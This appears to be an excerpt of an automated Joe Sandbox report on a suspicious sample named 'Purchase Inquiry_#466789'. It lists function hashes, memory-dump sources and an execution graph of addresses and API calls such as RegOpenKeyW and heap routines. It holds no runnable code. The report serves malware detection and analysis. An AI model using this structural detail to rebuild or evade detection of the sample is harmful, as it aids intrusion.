                    • Opcode ID: 6a66f42438d5fdfef4428bc18eeac5e781fcd544189c7f36d3878d75c287b0ea
                    • Instruction ID: f552b354836ef51617b0de108edc19e79766c27b977efd1620dcfcb5533abbf1
                    • Opcode Fuzzy Hash: 6a66f42438d5fdfef4428bc18eeac5e781fcd544189c7f36d3878d75c287b0ea
                    • Instruction Fuzzy Hash: A8E11874E0421A8FDB14DFA9C5809AEFBB2FF89305F249569E414AB356D730AD41CFA0
                    Function 05903808 Relevance: .3, Instructions: 312COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70f276d1136ce1bb0148d17eecfaeb88403da647d4fab32f016bdbc2b910b8e3
                    • Instruction ID: 6dfad3230a42cb766ea8fc0572348e610bebe236b24f53cca8a09f1db0781a33
                    • Opcode Fuzzy Hash: 70f276d1136ce1bb0148d17eecfaeb88403da647d4fab32f016bdbc2b910b8e3
                    • Instruction Fuzzy Hash: 6FE11874E042198FDB14DFA9C5809AEFBB2FF89305F249569E414AB356D730AD81CFA0
                    Function 059033D0 Relevance: .3, Instructions: 312COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2cd129a64f9635f2ab4ec1faefdb936b6ab23a368cf5f5299fa6b5da27ee8f77
                    • Instruction ID: 7927dbdee920f5478eeaaa6c28c7889027470b650f1dd14db0f3a90787f3dbf1
                    • Opcode Fuzzy Hash: 2cd129a64f9635f2ab4ec1faefdb936b6ab23a368cf5f5299fa6b5da27ee8f77
                    • Instruction Fuzzy Hash: 6AE11774E002198FDB14DFA9C5809AEFBB2FF89305F249569E414AB356D730AD81CF60
                    Function 059052E8 Relevance: .3, Instructions: 312COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 82632e695eb688def39701d6632bf05cd37cdbb0a9b452b9abdfde0387a10f54
                    • Instruction ID: a98da6a48fc7284d791e7364c8f1ba76290cb8195c66e0058501b6d214d010ce
                    • Opcode Fuzzy Hash: 82632e695eb688def39701d6632bf05cd37cdbb0a9b452b9abdfde0387a10f54
                    • Instruction Fuzzy Hash: E6E10874E042198FDB14DFA9C5809AEFBB2FF89305F249569E414AB356D730AD81CF60
                    Function 0116D4FC Relevance: .3, Instructions: 264COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673802580.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1160000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8471a5fc67205a475f699ce45a4e418ebad691e3d3cae278eb413e023ca991e
                    • Instruction ID: 84b31db5d8d8a23dc11e937632a6309f80cb09b11a561d9f9a665247d1c5039c
                    • Opcode Fuzzy Hash: f8471a5fc67205a475f699ce45a4e418ebad691e3d3cae278eb413e023ca991e
                    • Instruction Fuzzy Hash: A6A1A432E00206CFCF19DFB8D8545DEBBB6FF85304B15856AE901AB265DB32D966CB40
                    Function 05902F6B Relevance: .1, Instructions: 149COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5954d9fec8c0f09e4e563afc5d12778a89c7f85db69d8afe1708473e94ce5df0
                    • Instruction ID: 206130eb005acce5b35d222952a47216c173daed1f6de4c7872b839e8560a709
                    • Opcode Fuzzy Hash: 5954d9fec8c0f09e4e563afc5d12778a89c7f85db69d8afe1708473e94ce5df0
                    • Instruction Fuzzy Hash: E9514D75E012198FDB14CFA9D9805AEFBF2FF89304F249569D418A7356D7309941CFA0
                    Function 059033C0 Relevance: .1, Instructions: 128COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1676624744.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_5900000_Purchase Inquiry_#466789.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22e99767bad2a6f277002599ab97fd45396125f790cd69d54dd4d19265c8f278
                    • Instruction ID: dd6c0cff4b948beace6f3072d99b1997a4faae3a581794bd2ce6c1b273f1a953
                    • Opcode Fuzzy Hash: 22e99767bad2a6f277002599ab97fd45396125f790cd69d54dd4d19265c8f278
                    • Instruction Fuzzy Hash: 54512874E002198FDB14CFA9C5805AEFBF2FF89301F24956AD418AB356D731A942CFA0

                    Execution Graph

                    Execution Coverage:31.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.4%
                    Total number of Nodes:1846
                    Total number of Limit Nodes:93
                    execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 